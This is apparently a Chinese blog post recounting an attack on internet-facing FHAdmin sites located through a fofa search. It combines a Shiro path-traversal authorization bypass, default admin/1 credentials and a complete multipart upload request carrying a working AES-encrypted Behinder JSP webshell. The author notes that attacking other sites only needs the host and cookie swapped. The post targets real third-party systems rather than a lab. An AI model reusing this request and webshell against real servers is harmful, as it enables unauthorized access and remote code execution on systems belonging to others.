FHAdmin实战获取shell
又是一个愉快的摸鱼的一天,闲来无事去逛先知社区突然看到了一篇名为shrio权限实战绕过的文章(https://xz.aliyun.com/t/8311),这时不禁突然 回想起来之前看到过的一个微信公众号文章:那夜我做了个梦,差点我就相信了 !
于是便开启了新一轮的探索,我们可以去fofa去查找 intitle:FHAdmin,当然我之前是搜索过的所以在我打开搜索框输入 fh的一刹那便出现了我要的网站。
下面开始正式实战
这是我们的目标网站:
结合先知社区中看到的登录框图片:
真的是出人意料的相似啊,有木有.
当然在做这个实验的时候我们还是要先验证是否存在shiro漏洞的。
当然文章中说是额米有爆破出来密码的但是,我之前看过的微信文章之后是知道存在 管理员账号密码的 :admin/1
再记住密码的情况下
好家伙直接cookie明文传输密码。
OK,接下来就按照文章中的构造吧
发现上传成功,但是居然找不到文件。
于是接着看,文章中再上传点需要请求参数?uploadPath=/plugins/uploadify/
/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/
当然 在我在实验中还遇到了其他的问题,那就是光照猫画虎,没有注意到需要构造完整的文件上传包了,有点憨批了。
完整的如下截图:
POST /;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1873137538776189788600609431
Content-Length: 772
Connection: close
Cookie: JSESSIONID=587CDE2437A0AE2C40FB25DE5D71339C
Upgrade-Insecure-Requests: 1
DNT: 1
X-Forwarded-For: 127.0.0.1
-----------------------------1873137538776189788600609431
Content-Disposition: form-data; name="imgFile"; filename="shell.jsp"
Content-Type: application/octet-stream
AAAAA<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>bbbb
-----------------------------1873137538776189788600609431
【其他类似的情况下只需要修改 host以及cookie就可以了】,这里我用的冰蝎,走起直接上传webshell。
最新文章
- Python之路-python(css布局、JavaScript)
- 谈MongoDB读取连接超时的异常
- GMM算法k-means算法的比较
- Intel Visual Fortran Compiler 11调用lapack库实现并行多处理计算
- 设置UISegmentedControl中字体大小
- Elipse安装Spring Tool Suite
- Linux下的grep搜索命令详解(一)
- 应用Java泛型和反射导出CSV文件
- Android(java)学习笔记109:通过反射获取成员变量和成员方法并且使用
- swift学习之一致性hash
- windows下安装php真正的多线程扩展pthreads教程
- JqueryAjax异步加载在ASP.NET
- Python的列表
- jquery提供的插件无法删除cookie的解决办法
- LightOJ1336 Sigma Function
- 阿里云安装MySQL5.7
- Windows服务器上使用phpstudy部署PHP程序
- SDN 实验室学生们
- Java抽象类应用—模板方法模式
- Azure 中 Windows 虚拟机的大小
热门文章
- css设置背景图(背景图太大导致图片显示不全)
- k8s_使用k8s部署wordpress博客系统(一)
- 面试官:来说说 https 和 http 区别?
- Python学习笔记文件读写之生成随机的测试试卷文件
- nginx4层代理ssh服务
- 在datagridview中首列添加复选框
- PR / PO审批
- Webservice EASLogin登录接口说明
- mysql 创建表 datetime NOT NULL DEFAULT &#39;0000-00-00 00:00:00&#39; 默认值失败
- 面试视频知识点整理1-12(渲染机制,js运行机制,页面性能,错误监控)